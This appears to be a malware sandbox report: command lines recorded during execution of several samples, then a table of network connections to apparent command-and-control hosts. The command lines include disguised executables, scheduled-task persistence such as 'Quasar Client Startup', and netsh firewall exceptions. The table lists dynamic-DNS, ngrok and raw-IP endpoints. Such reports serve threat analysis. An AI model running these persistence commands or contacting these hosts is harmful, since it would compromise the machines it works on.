C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe
"C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"
C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
"C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hhjzBeMnS37F.bat" "
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe
C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe
C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDT8T7iTruRo.bat" "
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\plRuUThQ7DUV.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Xxys2Xb0KHAy.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\cmd.exe
cmd /c md 634977
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\SysWOW64\extrac32.exe
extrac32 /Y /E Gtk
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CcSCQtjZT2g.bat" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y0xNmMCFk8yV.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\SysWOW64\findstr.exe
findstr /V "Constitution" Wagon
C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X54ekAcmKbIv.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gubQos3ySnWn.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HtYfsW3vai5h.bat" "
C:\Windows\system32\chcp.com
chcp 65001
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| DE | 5.252.155.72:80 | 5.252.155.72 | tcp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.173.78.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| DE | 185.208.159.240:8080 | 185.208.159.240 | tcp |
| US | 8.8.8.8:53 | 240.159.208.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.155.252.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | maerchen-beat-frei.ch | udp |
| US | 45.42.212.91:443 | maerchen-beat-frei.ch | tcp |
| CH | 95.183.50.117:80 | 95.183.50.117 | tcp |
| US | 8.8.8.8:53 | 91.212.42.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.50.183.95.in-addr.arpa | udp |
| DE | 185.208.159.240:56001 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | fizzysu.sbs | udp |
| DE | 5.75.209.106:443 | fizzysu.sbs | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.75.5.in-addr.arpa | udp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| DE | 5.75.209.106:443 | fizzysu.sbs | tcp |
| US | 8.8.8.8:53 | plunder.dedyn.io | udp |
| TR | 216.9.224.66:5000 | plunder.dedyn.io | tcp |
| HK | 121.127.231.166:80 | 121.127.231.166 | tcp |
| US | 8.8.8.8:53 | 226.183.138.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.224.9.216.in-addr.arpa | udp |
| DE | 5.75.209.106:443 | fizzysu.sbs | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 166.231.127.121.in-addr.arpa | udp |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| CN | 124.221.100.215:80 | tcp | |
| CY | 213.133.94.133:4444 | tcp | |
| TR | 45.138.183.226:80 | 45.138.183.226 | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.134.89:80 | e5.o.lencr.org | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.44.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 8.8.8.8:53 | bash.mywire.org | udp |
| US | 192.188.88.248:2404 | bash.mywire.org | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | bash1.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash1.accesscam.org | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| JP | 8.209.212.26:7777 | 8.209.212.26 | tcp |
| US | 8.8.8.8:53 | 26.212.209.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 8.8.8.8:53 | bash2.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 10.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| CN | 120.26.164.174:8088 | tcp | |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mail.mindfulinvoice.online | udp |
| US | 199.127.63.127:8041 | mail.mindfulinvoice.online | tcp |
| US | 8.8.8.8:53 | 127.63.127.199.in-addr.arpa | udp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 207.231.111.48:80 | 207.231.111.48 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 48.111.231.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 4.4.8.8.in-addr.arpa | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| RU | 185.215.113.16:80 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| FR | 163.172.125.253:333 | tcp | |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | thefashionist.top | udp |
| US | 104.21.80.1:443 | thefashionist.top | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | impolitewearr.biz | udp |
| US | 8.8.8.8:53 | toppyneedus.biz | udp |
| US | 172.67.149.66:443 | toppyneedus.biz | tcp |
| US | 8.8.8.8:53 | 1.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.149.67.172.in-addr.arpa | udp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | lightdeerysua.biz | udp |
| US | 8.8.8.8:53 | suggestyuoz.biz | udp |
| US | 8.8.8.8:53 | hoursuhouy.biz | udp |
| US | 8.8.8.8:53 | mixedrecipew.biz | udp |
| HK | 45.192.96.63:6001 | 45.192.96.63 | tcp |
| US | 8.8.8.8:53 | affordtempyo.biz | udp |
| US | 8.8.8.8:53 | pleasedcfrown.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | yuriy-gagarin.com | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 104.21.82.94:443 | yuriy-gagarin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 63.96.192.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.82.21.104.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| DE | 147.45.44.131:80 | 147.45.44.131 | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| RU | 185.215.113.16:80 | tcp | |
| FR | 163.172.125.253:333 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.86.108.55:7771 | tcp | |
| RU | 185.215.113.16:80 | tcp | |
| US | 8.8.8.8:53 | 55.108.86.172.in-addr.arpa | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 8.8.8.8:53 | bash2.accesscam.org | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| FR | 163.172.125.253:333 | tcp | |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | sulfux.ddns.net | udp |
| FR | 90.113.179.93:9033 | sulfux.ddns.net | tcp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 72.167.39.236:443 | tcp | |
| US | 8.8.8.8:53 | 236.39.167.72.in-addr.arpa | udp |
| FR | 163.172.125.253:333 | tcp | |
| DE | 3.74.27.83:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| RU | 185.81.68.147:80 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| RU | 185.81.68.147:80 | tcp | |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 216.58.212.206:443 | docs.google.com | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 8.8.8.8:53 | 206.212.58.216.in-addr.arpa | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.187.227:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.204.65:443 | drive.usercontent.google.com | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | 65.204.58.216.in-addr.arpa | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| FR | 90.113.178.145:9033 | tcp | |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| DE | 18.192.31.30:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| FR | 163.172.125.253:333 | tcp | |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.4.4:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
| US | 8.8.8.8:53 | dash3.ddns.net | udp |
| US | 8.8.8.8:53 | dash4.ddns.net | udp |
| FR | 90.113.178.145:9033 | tcp | |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | clamfluffys.click | udp |
| US | 8.8.8.8:53 | nearycrepso.shop | udp |
| US | 8.8.8.8:53 | abruptyopsn.shop | udp |
| US | 8.8.8.8:53 | wholersorie.shop | udp |
| US | 8.8.8.8:53 | framekgirus.shop | udp |
| US | 8.8.8.8:53 | tirepublicerj.shop | udp |
| US | 8.8.8.8:53 | noisycuttej.shop | udp |
| US | 8.8.8.8:53 | rabidcowse.shop | udp |
| US | 8.8.8.8:53 | cloudewahsj.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 104.21.82.94:443 | yuriy-gagarin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wexos47815-61484.portmap.host | udp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | adidya354-21806.portmap.host | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | tuna91.duckdns.org | udp |
| TR | 176.232.184.98:1604 | tuna91.duckdns.org | tcp |
| DE | 52.57.120.10:16872 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | dash.3utilities.com | udp |
| US | 8.8.8.8:53 | dash1.3utilities.com | udp |
| US | 8.8.8.8:53 | dash2.ddns.net | udp |
| US | 192.188.88.248:2404 | bash2.accesscam.org | tcp |
| FR | 163.172.125.253:333 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| RU | 176.113.115.215:80 | tcp | |
| FR | 90.113.178.145:9033 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 192.168.50.1:4782 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mim.no-ip.net | udp |
